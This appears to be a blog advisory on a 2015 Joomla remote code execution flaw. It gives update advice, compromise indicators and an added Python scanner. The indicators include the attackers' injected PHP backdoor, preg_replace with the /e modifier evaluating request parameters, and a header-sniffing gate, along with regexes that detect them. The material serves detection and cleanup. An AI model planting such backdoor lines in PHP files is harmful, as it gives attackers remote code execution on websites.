There is a serious vulnerability in Joomla that is easy to exploit and is already being exploited in the wild. It affects all versions from 1.5 to 3.4. Details here: Critical 0-day Remote Command Execution Vulnerability in Joomla
If you are using Joomla 3, please update immediately to Joomla 3.4.6.
Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are handled (details here), so some of your extensions might no longer work after upgrading to it. I would suggest updating to Joomla 3.4.6 first and testing that all your extensions still work before you move to Joomla 3.4.7.
How to Check
I have quite a number of friends who are being hit by this.
Some signs of being attacked are as follows. Take a look at your <Joomla_Root_Folder>/index.php OR <Joomla_Root_Folder>/includes/framework.php. If you see any of the following in the first few lines of the code, then your site has been hit: the attacker has inserted their own PHP before Joomla's standard file header.
- The following from <Joomla_Root_Folder>/index.php:
<?php
if (isset($_REQUEST["gf"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}
if (isset($_REQUEST["Ix"])) {@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
if (isset($_REQUEST["Ps"])) {/*CzwNjYUj*/@preg_replace('/(.*)/e', @$_REQUEST['Ps'], '');/*wEKRfiiQ*/}
if (isset($_REQUEST["Ix"])) {/*NemlUoamst*/@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
if (isset($_REQUEST["LyYE"])) {@preg_replace('/(.*)/e', @$_REQUEST['LyYE'], '');}
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
- The following from <Joomla_Root_Folder>/includes/framework.php:
<?php if(stripos($_SERVER["HTTP_USER_AGENT"], "JDatabaseDriverMysqli") !== false || stripos($_SERVER["HTTP_X_FORWARDED_FOR"], "JDatabaseDriverMysqli") !== false) exit;
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
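To make the check above repeatable across several sites, here is a small scanner, added as an example and not part of the original post or of Joomla itself. It reads the first lines of index.php and includes/framework.php under a Joomla root and reports three indicators drawn from the snippets above: a preg_replace() call using the /e (eval) modifier with a request parameter as the replacement, the User-Agent/X-Forwarded-For check for "JDatabaseDriverMysqli", and, more generally, any PHP statement placed before Joomla's "/** @package Joomla.Site" docblock. The indicator names, the 30-line window and the sample file contents are the example's own assumptions; the samples are constructed from the page.

```python
"""Added example: scan Joomla entry files for the injected code shown above.

Not part of the original post. The indicator names, the 30-line window and
the sample file contents are this example's own choices.
"""
from __future__ import annotations

import re
import sys
from pathlib import Path

# The two files the post says the injection lands in, relative to the Joomla root.
TARGET_FILES = ("index.php", "includes/framework.php")

# Regexes distilled from the injected snippets in the post:
#  - preg_replace() with the /e (eval) modifier and a request parameter as the
#    replacement, i.e. a one-line remote code execution backdoor;
#  - the header-sniffing gate that exits when "JDatabaseDriverMysqli" appears in
#    the User-Agent or X-Forwarded-For header.
INDICATORS = {
    "preg_replace_eval": re.compile(
        r"preg_replace\s*\(\s*['\"]/.*?/[a-zA-Z]*e[a-zA-Z]*['\"]\s*,\s*@?\$_(REQUEST|GET|POST|COOKIE)"
    ),
    "user_agent_gate": re.compile(
        r"stripos\s*\(\s*\$_SERVER\s*\[\s*['\"]HTTP_(USER_AGENT|X_FORWARDED_FOR)['\"]\s*\]"
        r"\s*,\s*['\"]JDatabaseDriverMysqli['\"]"
    ),
}


def has_code_before_docblock(head: str) -> bool:
    """A stock Joomla index.php / framework.php opens with '<?php' followed by the
    '/** @package Joomla.Site ... */' docblock. Any statement squeezed in before
    that docblock is not Joomla's, whatever it looks like."""
    idx = head.find("/**")
    if idx < 0:
        return False  # no docblock in the window; leave this to the other checks
    prefix = head[:idx]
    prefix = re.sub(r"^\s*<\?php", "", prefix)              # drop the PHP open tag
    prefix = re.sub(r"/\*.*?\*/", "", prefix, flags=re.S)   # drop filler comments like /*xncVpILmY*/
    return prefix.strip() != ""


def scan_text(text: str, max_lines: int = 30) -> list[str]:
    """Return the indicator names found in the first max_lines lines of a file."""
    head = "\n".join(text.splitlines()[:max_lines])
    hits = [name for name, rx in INDICATORS.items() if rx.search(head)]
    if has_code_before_docblock(head):
        hits.append("code_before_header")
    return hits


def scan_root(root: Path) -> dict[str, list[str]]:
    """Scan the two target files under a Joomla root; map file -> indicators found."""
    findings: dict[str, list[str]] = {}
    for rel in TARGET_FILES:
        path = root / rel
        if path.is_file():
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings[rel] = hits
    return findings


# Constructed samples: a clean Joomla header and the two injected forms from the post.
CLEAN_INDEX = (
    "<?php\n/**\n * @package Joomla.Site\n *\n"
    " * @license GNU General Public License version 2 or later; see LICENSE.txt\n */\n\n"
    "define('_JEXEC', 1);\n"
)
INFECTED_INDEX = (
    "<?php\n"
    "if (isset($_REQUEST[\"gf\"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}\n"
    "/**\n * @package Joomla.Site\n */\n"
)
INFECTED_FRAMEWORK = (
    "<?php if(stripos($_SERVER[\"HTTP_USER_AGENT\"], \"JDatabaseDriverMysqli\") !== false"
    " || stripos($_SERVER[\"HTTP_X_FORWARDED_FOR\"], \"JDatabaseDriverMysqli\") !== false) exit;\n"
    "/**\n * @package Joomla.Site\n */\n"
)

if __name__ == "__main__":
    if len(sys.argv) == 2:
        # Usage: python joomla_check.py /path/to/joomla_root
        for rel, hits in scan_root(Path(sys.argv[1])).items():
            print(f"{rel}: {', '.join(hits)}")
    else:
        for label, sample in (("clean", CLEAN_INDEX), ("index.php", INFECTED_INDEX),
                              ("framework.php", INFECTED_FRAMEWORK)):
            print(f"{label}: {scan_text(sample) or 'no indicators'}")
```

The "code_before_header" check is the one worth keeping even after the attackers change their parameter names or obfuscation, because it keys on Joomla's own file layout rather than on the exact injected strings; a hit on it alone still means the file should be compared against a pristine copy from the Joomla release archive.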